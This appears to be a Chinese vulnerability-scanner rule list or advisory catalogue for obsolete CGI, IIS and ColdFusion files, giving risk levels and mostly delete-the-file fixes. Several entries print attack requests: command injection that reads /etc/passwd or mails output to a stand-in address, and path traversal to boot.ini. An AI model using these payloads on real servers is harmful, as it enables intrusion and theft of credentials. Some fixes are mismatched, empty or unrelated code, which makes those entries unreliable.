类型:攻击型 名字:wwwboard.pl 风险等级:低 描述:wwwboard.pl 程序容易引起攻击者对服务器进行 D.O.S 攻击 建议:如无必要可以删除该文件 解决方法:对 get_variables 的子程序中的下面这段: if($FORM{\'followup\'}){$followup=\"1\"; @followup_num=split(/,/,$FORM{\'followup\'}); $num_followups=@followups=@followup_num;$last_message=pop(@followups);$origdate=\"$FORM{\'origdate\'}\"; $origname=\"$FORM{\'origname\'}\"; $origsubject=\"$FORM{\'origsubject\'}\";} 
替换为: 
if($FORM{\'followup\'}){ $followup=\"1\"; @followup_num=split(/,/,$FORM{\'followup\'}); $num_followups=@followups=@followup_num; $last_message=pop(@followups); $origdate=\"$FORM{\'origdate\'}\"; $origname=\"$FORM{\'origname\'}\"; $origsubject=\"$FORM{\'origsubject\'}\"; #WWWBoardBombPatch #WrittenBy:SamuelSparlingsparling@slip.net) $fn=0; while($fn<$num_followups) { $cur_fup=@followups$fn]; $dfn=0; foreach$fm(@followups) { if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn) { &error(board_bomb); } $dfn++; } $fn++; } #EndWWWBoardBombPatch } 
类型:攻击型 名字:uploader.exe 风险等级:中 描述:如果您使用NT作为您的WebServer的操作系统,入侵者能够利用    uploader.exe上传任何文件 建议:将uploader.exe从你的Web目录移走或删除 解决方法:将uploader.exe从你的Web目录移走或删除 
类型:攻击型 名字:bdir.htr 风险等级:高 描述:如果您使用NT做为您的WebServer的操作系统,而且bdir.htr存在    于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上    无止境的创建ODBC数据库,并生成一些可执行的文件。 建议:将bdir.htr从你的Web目录移走或删除 解决方法:将bdir.htr从你的Web目录移走或删除 
类型:攻击型 名字:Count.cgi 风险等级:高 描述:在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一个溢出    错误,允许入侵者无须登录而远程执行任何指令。 建议:如无必要可以删除该文件 解决方法:将wwwcount升级到2.4或者以上 
类型:攻击型 名字:test-cgi 风险等级:高 描述:test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息 建议:建议审核cgi-bin目录下的执行程序,严格控制访问权限 解决方法:删除test-cgi文件 
类型:攻击型 名字:nph-test-cgi 风险等级:高 描述:nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息 建议:建议审核cgi-bin目录下的执行程序,严格控制访问权限 解决方法:删除nph-test-cgi文件 
类型:攻击型 名字:php.cgi 风险等级:低 描述:php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系    统文件可以被入侵者读取的漏洞 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除php.cgi程序是最好的办法 
类型:攻击型 名字:handler 风险等级:低 描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在缓存溢出    错误,允许入侵者在server上远程执行一段程序:    telnettarget.machine.com80    GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download    HTTP/1.0 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除handler文件 
类型:攻击型 名字:webgais 风险等级:高 描述:/cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个    毛病使入侵者可以绕过程序的安全机制,执行系统命令:    POST/cgi-bin/webgaisHTTP/1.0    Content-length:85(replacethiswiththeactuallengthof    the\"exploit\"line)    telnettarget.machine.com80query=\';mail+you\\@your.host 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除webgais文件 
类型:攻击型 名字:websendmail 风险等级:高 描述:/cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:    telnettarget.machine.com80    POST/cgi-bin/websendmailHTTP/1.0    Content-length:xxx(shouldbereplacedwiththeactual    lengthofthestringpassedtotheserver,inthiscase    xxx=90) receiver=;mail+your_address\\@somewhere.org    &content=a 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:高级用户:编辑websendmail脚本,过滤特殊字符 一般用户:删除websendmail文件 
类型:攻击型 名字:webdist.cgi 风险等级:高 描述:对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点    允许入侵者无须登录而在系统上执行任何指令:    http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi 
类型:攻击型 名字:faxsurvey 风险等级:高 描述:在LinuxS.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无    须登录就能在服务器执行指令:http://joepc.linux.elsewhere.org/    cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin/faxsurvey文件 
类型:攻击型 名字:htmlscript 风险等级:中 描述:安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使    入侵者可以查看服务器上的任何文件:    http://www.vulnerable.server.com/cgi-bin/htmlscript?../../    ../../etc/passwd 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到      3.0以上 
类型:攻击型 名字:pfdisplay 风险等级:中 描述:在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序    允许入侵者非法查看服务器上的文件 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin/pfdisplay文件,或者打补丁,补丁可以去      sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下载:      Filename:README.patch.3018      Algorithm#1(sum-r):3795511README.patch.3018      Algorithm#2(sum):1545511README.patch.3018      MD5checksum:1169EB51D75E0794C64C2C1FD6211B69      Filename:patchSG0003018      Algorithm#1(sum-r):016792patchSG0003018      Algorithm#2(sum):128762patchSG0003018      MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8      Filename:patchSG0003018.idb      Algorithm#1(sum-r):013392patchSG0003018.idb      Algorithm#2(sum):2512patchSG0003018.idb      MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB      Filename:patchSG0003018.performer_tools_man      Algorithm#1(sum-r):102018patchSG0003018.per-      -former_tools_man      Algorithm#2(sum):31448patchSG0003018.performer_t-      -ools_man      MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29      Filename:patchSG0003018.performer_tools_sw      Algorithm#1(sum-r):4847418patchSG0003018.perform-      -er_tools_sw      Algorithm#2(sum):2817618patchSG0003018.performer_      tools_sw      MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F 
类型:攻击型 名字:www-sql 风险等级:中 描述:www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保    护的文件 建议:最好删除www-sql文件 解决方法:#ifPHPFASTCGI      while(FCGI_Accept()>=0)      {      #endif      s=getenv(\"REDIRECT_STATUS\");      if(!s){      puts(\"Content-type:text/plain\\r\\n\\r\\nPHP/FIdetected      aninternalerror.Pleaseinformsa@hogia.netofwhat      youjustdid.\\n\");      exit(1);      }      s=getenv(\"PATH_TRANSLATED\"); 
类型:攻击型 名字:view-source 风险等级:高 描述:在cgi-bin目录下的view-source程序没有对输入进行安全检查,使    入侵者可以查看服务器上的任何文件 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin目录下的viewsource程序 
类型:攻击型 名字:campas 风险等级:高 描述:在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看    server上的重要文件:    telnetwww.xxxx.net80    Trying200.xx.xx.xx...    Connectedtovenus.xxxx.net    Escapecharacteris\'^]\'.    GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin目录下的campas程序 
类型:攻击型 名字:aglimpse 风险等级:高 描述:在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登    录而随意执行任何指令  建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin目录下的aglimpse程序 
类型:攻击型 名字:AT-admin.cgi 风险等级:中 描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允    许普通用户完全控制整个系统 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin目录下的AT-admin.cgi程序 
类型:攻击型 名字:finger 风险等级:中 描述:这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,    但是如果将参数改成本机,本机上的帐号信息将暴露无遗:    /cgi-bin/finger?@localhost 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin目录下的finger程序 
类型:攻击型 名字:webwho.pl 风险等级:中 描述:如果在您的Web可执行目录中有webwho.pl这个CGI脚本,那么入侵    者将能利用他阅读启动Web的用户能读写执行的任何文件。 建议:将webwho.pl从您的Web目录中删除或移走 解决方法:将webwho.pl从您的Web目录中删除或移走 
类型:攻击型 名字:w3-msql 风险等级:低 描述:MiniSQL 软件包发行版本附带的一个 CGI(w3-msql)可被用于以    httpd 的 uid 权限执行任意代码。这个安全漏洞是由程序中的 scanf() 函数引起的。 建议:如果您安装了 MiniSQL 软件包,请您将 /cgi-bin/ 目录下的 w3-msql文件删除或移走解决方法:如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql      文件删除或移走,或使用以下补丁。 
补丁: ------w3-msql.patch--------- 
410c410 scanf(\"%s\",boundary);
--- 418c418  
------w3-msql.patch--------- 
类型:攻击型 名字:NetscapeFastTrackserver2.0.1a 风险等级:中 描述:UnixWare7.1附带的NetscapeFastTrackserver2.0.1a存在一个远程    缓冲区溢出漏洞。缺省地,监听457端口的httpd通过http协议提供    UnixWare文档。如果向该服务器传送一个长度超过367字符的GET请    求,会使缓冲区溢出,EIP值被覆盖将可能导致任意代码以httpd权    限执行。 建议:临时解决方法是关闭NetscapeFastTrack服务器 解决方法:临时解决方法是关闭NetscapeFastTrack服务器。 
类型:攻击型 名字:AnyForm.cgi 风险等级:高 描述:位于cgi-bin目录下的AnyForm.cgi程序,是用于简单表单通过邮件    传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用,    在server上执行任何指令. 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:建议升级该cgi程序,或者删除该文件 
类型:攻击型 名字:whois.cgi 风险等级:低 描述:在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包括: WhoisInternicLookup-version:1.02 CCWhois-Version:1.0 Matt\'sWhois-Version:1   他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任 意的代码 建议:将在您Web目录中问whois.cgi删除或移走 解决方法:将在您Web目录中问whois.cgi删除或移走 
类型:攻击型 名字:environ.cgi 风险等级:中 描述:在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi    程序,有一个毛病允许入侵者绕过安全机制,浏览服务器上的一些    文件。 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:建议升级该cgi程序,或者删除该文件 
类型:攻击型 名字:wrap 风险等级:中 描述:/cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上文件    的非法访问,如:    http://host/cgi-bin/wrap?/../../../../../etc 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin/wrap文件 
类型:攻击型 名字:edit.pl 风险等级:中 描述:/cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用    户的配置情况:  http://www.sitetracker.com/cgi-bin/edit.pl?account=&password= 建议:建议审核cgi-bin目录,避免有不必要的程序存在 解决方法:删除/cgi-bin/edit.pl文件 
类型:攻击型 名字:service.pwd 风险等级:中 描述:UNix系统的http://www.hostname.com/_vti_pvt/service.pwd可读,    将暴露用户密码信息 建议:建议删除 解决方法:chownrootservice.pwd chmod700service.pwd 
类型:攻击型 名字:administrators.pwd 风险等级:中 描述:UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd    可读,将暴露用户密码信息 建议:建议删除 解决方法:chownrootadministrators.pwd chmod700administrators.pwd 相关连接:  
类型:攻击型 名字:users.pwd 风险等级:中 描述:UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,    将暴露用户密码信息 建议:建议删除 解决方法:chownrootusers.pwd chmod700users.pwd 
类型:攻击型 名字:authors.pwd 风险等级:中 描述:UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,    将暴露用户密码信息 建议:建议删除 解决方法:chownrootauthors.pwd chmod700authors.pwd 
类型:攻击型 名字:visadmin.exe 风险等级:中 描述:在OmniHTTPdWebServer的cgi-bin目录下存在这个文件visadmin.exe,    那么攻击者只要输入下面的命令:    http://omni.server/cgi-bin/visadmin.exe?user=guest数分钟之    后服务器的硬盘将会被撑满 建议:建议删除 解决方法:把visadmin.exe从cgi-bin目录中删除 
类型:攻击型 名字:get32.exe 风险等级:高 描述:Alibaba的webserver,其cgi-bin目录存在get32.exe这个程序,允    许入侵者任意执行一条指令: http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\\command.com 建议:建议删除 解决方法:把GET32.exe从cgi-bin目录中删除 
类型:攻击型 名字:alibaba.pl 风险等级:高 描述:Alibaba的webserver,其cgi-bin目录存在alibaba.pl这个程序,允    许入侵者任意执行一条指令:    http://www.victim.com/cgi-bin/alibaba.pl|dir 建议:建议删除 解决方法:把alibaba.pl从cgi-bin目录中删除 
类型:攻击型 名字:tst.bat 风险等级:高 描述:Alibaba的webserver,其cgi-bin目录存在tst.bat这个程序,允许    入侵者任意执行一条指令: http://www.victim.com/cgi-bin/tst.bat|type%20c:\\windows\\win.ini 建议:建议删除 解决方法:把tst.bat从cgi-bin目录中删除 
类型:攻击型 名字:fpcount.exe 风险等级:低 描述:如果您使用NT作为您的WebServer的操作平台,并只安装了SP3补丁,    那么入侵者能利用这个CGI程序进行DoS攻击,使您的IIS服务拒绝    访问。 建议:将在您Web目录中的fpcount.exe删除或移走 解决方法:将在您Web目录中的fpcount.exe删除或移走 
类型:攻击型 名字:openfile.cfm 风险等级:低 描述:如果在您的Web目录中含有    /cfdocs/expeval/exprcalc.cfm    /cfdocs/expeval/sendmail.cfm    /cfdocs/expeval/eval.cfm    /cfdocs/expeval/openfile.cfm    /cfdocs/expeval/displayopenedfile.cfm    /cfdocs/exampleapp/email/getfile.cfm    /cfdocs/exampleapp/publish/admin/addcontent.cfm   这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件 建议:将在您Web目录中的openfile.cfm删除或移走 解决方法:将在您Web目录中的openfile.cfm删除或移走 
类型:攻击型 名字:exprcalc.cfm 风险等级:低 描述:如果在您的Web目录中含有    /cfdocs/expeval/exprcalc.cfm    /cfdocs/expeval/sendmail.cfm    /cfdocs/expeval/eval.cfm    /cfdocs/expeval/openfile.cfm    /cfdocs/expeval/displayopenedfile.cfm    /cfdocs/exampleapp/email/getfile.cfm    /cfdocs/exampleapp/publish/admin/addcontent.cfm   这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件 建议:将在您Web目录中的exprcalc.cfm删除或移走 解决方法:将在您Web目录中的exprcalc.cfm删除或移走 相关连接:http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full 
类型:攻击型 名字:displayopenedfile.cfm 风险等级:低 描述:如果在您的Web目录中含有    /cfdocs/expeval/exprcalc.cfm    /cfdocs/expeval/sendmail.cfm    /cfdocs/expeval/eval.cfm    /cfdocs/expeval/openfile.cfm    /cfdocs/expeval/displayopenedfile.cfm    /cfdocs/exampleapp/email/getfile.cfm    /cfdocs/exampleapp/publish/admin/addcontent.cfm   这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件 建议:将在您Web目录中的displayopenedfile.cfm删除或移走 解决方法:将在您Web目录中的displayopenedfile.cfm删除或移走 
类型:攻击型 名字:sendmail.cfm 风险等级:中 描述:将在您Web目录中的openfile.cfm删除或移走    在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包括:    WhoisInternicLookup-version:1.02    CCWhois-Version:1.0    Matt\'sWhois-Version:1    他们将使入侵者    能够在您的系统上使用启动httpd用户的权限执行任意的代码    如果在您的Web目录中含有    /cfdocs/expeval/exprcalc.cfm    /cfdocs/expeval/sendmail.cfm    /cfdocs/expeval/eval.cfm    /cfdocs/expeval/openfile.cfm    /cfdocs/expeval/displayopenedfile.cfm    /cfdocs/exampleapp/email/getfile.cfm    /cfdocs/exampleapp/publish/admin/addcontent.cfm   这些文件,那么入侵者可能能够利用它们读到您系统上的所有文件 建议:将在您Web目录中的sendmail.cfm删除或移走 解决方法:将在您Web目录中的sendmail.cfm删除或移走 
类型:攻击型 名字:codebrws.asp 风险等级:中 描述:如果您使用NT+IIS作为您的WebServer的情况下,入侵者能够利用    这个ASP查看您系统上所有启动httpd用户有权限阅读的文件请前往    以下地址查询补丁InternetInformationServer:    ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/    Viewcode-fix/    SiteServer:    ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/    usa/siteserver3/hotfixes-postsp2/Viewcode-fix/    http://www.microsoft.com/security/products/iis/checklist.asp 建议:将在您Web目录中的codebrws.asp删除或移走 解决方法:将在您Web目录中的codebrws.asp删除或移走 
类型:信息型 名字:codebrws.asp_1 风险等级:中 描述:在/iissamples/exair/howitworks/下面存在codebrws.asp文件,    用下面的路径:    http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?    source=/index.asp就可以查看到index.asp的源码。实际上任何    ascii文件都可以浏览。 建议:删除名叫/iissamples/的web目录 解决方法:将在您Web目录中的codebrws.asp删除或移走 请前往以下地址查询补丁 InternetInformationServer: ftp://ftp.microsoft.com/bussys/i ... s/usa/Viewcode-fix/ SiteServer: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/ siteserver3/hotfixes-postsp2/Viewcode-fix/ http://www.microsoft.com/security/products/iis/checklist.asp 相关连接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ usa/Viewcode-fix/ 
类型:攻击型 名字:showcode.asp_1 风险等级:中 描述:在/msads/Samples/SELECTOR/目录下存在showcode.asp文件,用下    面的路径: http://www.xxx.com/msadc/Samples/SELECTOR/showcode.asp?source=/ msadc/Samples/../../../../../boot.ini 
  可以查到boot.ini文件的内容;实际上入侵者能够利用这个ASP查看您 系统上所有启动httpd用户有权限阅读的文件 
建议:禁止对/msads目录的匿名访问 解决方法:将在您Web目录中的showcode.asp删除或移走 请前往以下地址查询补丁 InternetInformationServer: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/ Viewcode-fix/ SiteServer: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/ siteserver3/hotfixes-postsp2/Viewcode-fix/ http://www.microsoft.com/security/products/iis/checklist.asp 相关连接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ usa/Viewcode-fix/ 
类型:攻击型 名字:/msadc目录可以访问 风险等级:中 描述:WindowsNTIISserver下的/msadc目录可以访问,会造成一系列安全    问题,包括被入侵者非法调用应用程序 建议:建议删除不必要的由IIS缺省安装形成的目录 解决方法:禁止/msadc目录,如果必须打开该目录,至少应该设置成合法      用户需要密码才能访问 
类型:攻击型 名字:search97.vts 风险等级:中 描述:这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取    的文件 建议:将在您Web目录中的search97.vts删除或移走 解决方法:将在您Web目录中的search97.vts删除或移走,或前往以下地址      下载Patch      https://customers.verity.com/products/server/310/      patches/ 
类型:攻击型 名字:carbo.dll 风险等级:低 描述:如果您安装了SystemsrunningiCatSuiteversion3.0,那么它将自    动在你的系统上添加一个叫carbo.dll的文件,而入侵者将能利用    这个文件访问您系统上的热和文件 建议:将在您Web目录中的openfile.cfm删除或移走 解决方法:将在您Web目录中的openfile.cfm删除或移走 
类型:攻击型 名字:whois_raw.cgi 风险等级:低 描述:因为whois_raw.cgi作者的失误,这个CGI将使入侵者能够以您系统    上启动httpd的用户的权限执行您系统上任意的程序 建议:将在您Web目录中的whois_raw.cgi删除或移走 解决方法:将在您Web目录中的whois_raw.cgi删除或移走 
类型:攻击型 名字:doc 风险等级:低 描述:您的Web目录可以文件列表,这将帮助入侵者分析您的系统信息 建议:将您的所有Web目录设置为不能文件列表 解决方法:将您的所有Web目录设置为不能文件列表 
类型:攻击型 名字:.html/............./config.sys 风险等级:低 描述:如果您使用的是较久版本的ICQ,那么入侵者能够利用它阅读您机    器上的所有文件 建议:下载新版本的ICQ 解决方法:请前往以下地址下载新版本的ICQ 
类型:攻击型 名字:....../ 风险等级:中 描述:您使用的WebServer软件能使入侵者阅读您系统上的所有文件 建议:更换或升级您的WebServer软件 解决方法:更换或升级您的WebServer软件 
类型:攻击型 名字:no-such-file.pl 风险等级:低 描述:由于您的WebServer软件的缺陷,使得入侵者能够利用不存在的CGI    脚本请求来分析您的站点的目录结构 建议:升级您的WebServer软件 解决方法:升级您的WebServer软件 
类型:攻击型 名字:_vti_bin/shtml.dll 风险等级:低 描述:入侵者利用这个文件将能使您的系统的CPU占用率达到100% 建议:将_vti_bin/shtml.dll从您的Web目录删除或移走 解决方法:将_vti_bin/shtml.dll从您的Web目录删除或移走 
类型:信息型 名字:nph-publish 风险等级:中 描述:在/cgi-bin目录下存在nph-publish文件,这使入侵者能通过www浏    览服务器上的任何文件 建议:建议审查/cgi-bin目录,删除不必要的cgi程序 解决方法:删除nph-publish文件 
类型:信息型 名字:showcode.asp 风险等级:中 描述:在/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Sampl    es/SELECTOR/目录下存在showcode.asp文件可以被入侵者利用来查    看服务器上的文件内容 建议:最好禁止/msadc这个web目录的匿名访问,建议删除这个web目录 解决方法:删除showcode.asp文件 
类型:信息型 名字:_vti_inf.html 风险等级:中 描述:web根目录下存在_vti_inf.html文件,该文件是Frontpageexten-    -tionserver的特征,包含了一系列FrontpageExtentionServer的重    要信息;而且FrontpageExtentionserver是一个有很多漏洞的web    服务,用它入侵者可能直接修改首页文件。 建议:用ftp等其它方式上载网页文件 解决方法:卸载FrontpageExtentionServer 
类型:信息型 名字:index.asp::$DATA 风险等级:中 描述:asp程序的源代码可以被后缀+::$DATA的方法查看到,这样入侵者可    以设法查到服务器数据库密码等重要信息 建议:建议留意微软最新关于codeview的补丁和安全公告 解决方法:安装servicespack6或者打补丁: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/ fesrc-fix/ 相关连接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ chs/security/fesrc-fix/ 
类型:攻击型 名字:main.asp%81 风险等级:低 描述:asp程序的源代码可以被后缀+%81的方法查看到,这样入侵者可以设    法查到服务器数据库密码等重要信息 建议:建议留意微软最新关于codeview的补丁和安全公告 解决方法:安装servicespack6或者打补丁: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security /fesrc-fix/ 相关连接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ chs/security/fesrc-fix/ 
类型:信息型 名字:showcode.asp_2 风险等级:中 描述:在/msadc/Samples/SELECTOR/目录下存在showcode.asp文件,用下    面的路径:http://www.xxx.com/msadc/Samples/SELECTOR/showcode.    asp?source=/msadc/Samples/../../../../../boot.ini可以查到    boot.ini文件的内容;实际上入侵者能够利用这个ASP查看您系统上    所有启动httpd用户有权限阅读的文件 建议:禁止对/msadc目录的匿名访问 解决方法:将在您Web目录中的showcode.asp删除或移走 请前往以下地址查询补丁 InternetInformationServer:ftp://ftp.microsoft.com/bussys/iis/iis -public/fixes/usa/Viewcode-fix/ SiteServer: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/ siteserver3/hotfixes-postsp2/Viewcode-fix/ http://www.microsoft.com/security/products/iis/checklist.asp 相关连接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ usa/Viewcode-fix/ 
类型:攻击型 名字:ism.dll 风险等级:高 描述:在/scripts/iisadmin/目录下存在ism.dll文件,这个文件有一个溢    出错误,允许入侵者在服务器上执行任意一段程序;另外。攻击者    还随时可以令服务器的www服务死掉 建议:禁止对/scripts目录的匿名访问 解决方法:删除/scripts/iisadmin/ism.dll,或者打开iis的管理控制台,      选取默认web站点,点右键,选取属性,点:\"主目录\",在起始      点那行点\"配置\"按钮,将\".htr\"的应用程序映射项删除 
类型:信息型 名字:codebrws.asp_2 风险等级:中 描述:在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面    的路径:http://www.xxx.com/iissamples/exair/howitworks/code    brws.asp?source=/index.asp就可以查看到index.asp的源码。实    际上任何ascii文件都可以浏览。 建议:删除名叫/iissamples/的web目录 解决方法:将在您Web目录中的codebrws.asp删除或移走 请前往以下地址查询补丁 InternetInformationServer: ftp://ftp.microsoft.com/bussys/i ... s/usa/Viewcode-fix/ SiteServer: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/ siteserver3/hotfixes-postsp2/Viewcode-fix/ http://www.microsoft.com/security/products/iis/checklist.asp 相关连接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/ usa/Viewcode-fix/ 
类型:攻击型 名字:uploadn.asp 风险等级:高 描述:在/scripts/tools目录下存在uploadn.asp程序,只要入侵者有一个    可用帐号,哪怕是Guest帐号,就可以上传任何文件到你的web目录,    除了替换主页外,他更可以进一步控制你的整个系统! 建议:删除名为/scripts的web目录 解决方法:删除uploadn.asp文件 相关连接: 
类型:攻击型 名字:uploadx.asp 风险等级:高 描述:在/scripts/tools目录下存在uploadx.asp程序,只要入侵者有一个    可用帐号,哪怕是Guest帐号,就可以上传任何文件到你的web目录,    除了替换主页外,他更可以进一步控制你的整个系统! 建议:删除名为/scripts的web目录 解决方法:删除uploadx.asp文件 相关连接: 
类型:攻击型 名字:query.asp 风险等级:低 描述:在/IISSAMPLES/ExAir/Search/的目录下存在query.asp文件,这个    文件有个漏洞如果被攻击者利用,后果将导致CPU使用率达到100%,    机器速度将明显变慢 建议:禁止对/iissamples目录的存取 解决方法:删除query.asp文件 
71 类型:攻击型 名字:advsearch.asp 风险等级:低 描述:在/IISSAMPLES/ExAir/Search/的目录下存在query.asp文件,这个    文件有个漏洞如果被攻击者利用,后果将导致CPU使用率达到100%,    机器速度将明显变慢 建议:禁止对/iissamples目录的存取 解决方法:删除advsearch.asp文件 
类型:攻击型 名字:search.asp 风险等级:低 描述:在/IISSAMPLES/ExAir/Search/的目录下存在search.asp文件,这个    文件有个漏洞如果被攻击者利用,后果将导致CPU使用率达到100%,    机器速度将明显变慢 建议:禁止对/iissamples目录的存取 解决方法:删除search.asp文件 
类型:攻击型 名字:getdrvrs.exe 风险等级:中 描述:这个存在于/scripts/tools目录下的getdrvrs.exe文件允许任何一    个用户在web根目录下创建任何文件,和创建ODBC数据源 建议:禁止对/scripts/tools目录的匿名访问 解决方法:删除getdrvrs.exe文件 
类型:攻击型 名字:newdsn.exe 风险等级:中 描述:这个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个    用户在web根目录下创建任何文件,如: http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft %2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft &dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr= 建议:禁止对/scripts/tools目录的匿名访问 解决方法:删除newdsn.exe文件 
类型:信息型 名字:showcode.asp_3 风险等级:中 描述:在/iissamples/exair/howitworks/存在code.asp文件,入侵者利用    该文件可以查看服务器硬盘上任何一个ASCII文件的内容,并显示asp    程序文件的源代码 建议:禁止对/iissamples的web目录的匿名访问 解决方法:删除showcode.asp文件 
类型:攻击型 名字:aexp.htr 风险等级:中 描述:在/iisadmpwd目录下存在aexp.htr文件,类似的还有aexp2.htr,    aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破    解和修改NT用户的密码。 建议:建议禁止对/iisadmpwd目录的访问 解决方法:删除aexp.htr文件 
类型:攻击型 名字:aexp2.htr 风险等级:中 描述:在/iisadmpwd目录下存在aexp2.htr文件,类似的还有aexp2.htr,    aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破    解和修改NT用户的密码。 建议:建议禁止对/iisadmpwd目录的访问 解决方法:删除aexp2.htr文件 
类型:攻击型 名字:aexp3.htr 风险等级:中 描述:在/iisadmpwd目录下存在aexp3.htr文件,类似的还有aexp2.htr,    aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破    解和修改NT用户的密码。 建议:建议禁止对/iisadmpwd目录的访问 解决方法:删除aexp3.htr文件 
类型:攻击型 名字:aexp4b.htr 风险等级:中 描述:在/iisadmpwd目录下存在aexp4b.htr文件,类似的还有aexp2.htr,    aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破    解和修改NT用户的密码。 建议:建议禁止对/iisadmpwd目录的访问 解决方法:删除aexp4b.htr文件 
类型:攻击型 名字:achg.htr 风险等级:中 描述:在/iisadmpwd目录下存在aechg.htr文件,类似的还有aexp2.htr,    aexp3.htr和aexp4b.htr等,这些文件允许攻击者用穷举法等方式破    解和修改NT用户的密码。 建议:建议禁止对/iisadmpwd目录的访问 解决方法:删除achg.htr文件 
类型:攻击型 名字:ExprCale.cfm 风险等级:中 描述:在Coldfusion的web目录:/cfdocs/expeval/ExprCalc.cfm文件,这    个文件有个漏洞允许用户读取服务器硬盘上的任意文件包括用户密    码数据库sam文件 建议:删除相关的文件 解决方法:删除ExprCalc.cfm文件 
类型:攻击型 名字:getfile.cfm 风险等级:中 描述:在Coldfusion的web目录:/getfile.cfm文件,这个文件有个漏洞允 许用户读取服务器硬盘上的任意文件包括用户密码数据库sam文件 建议:删除相关的文件 解决方法:删除getfile.cfm文件 
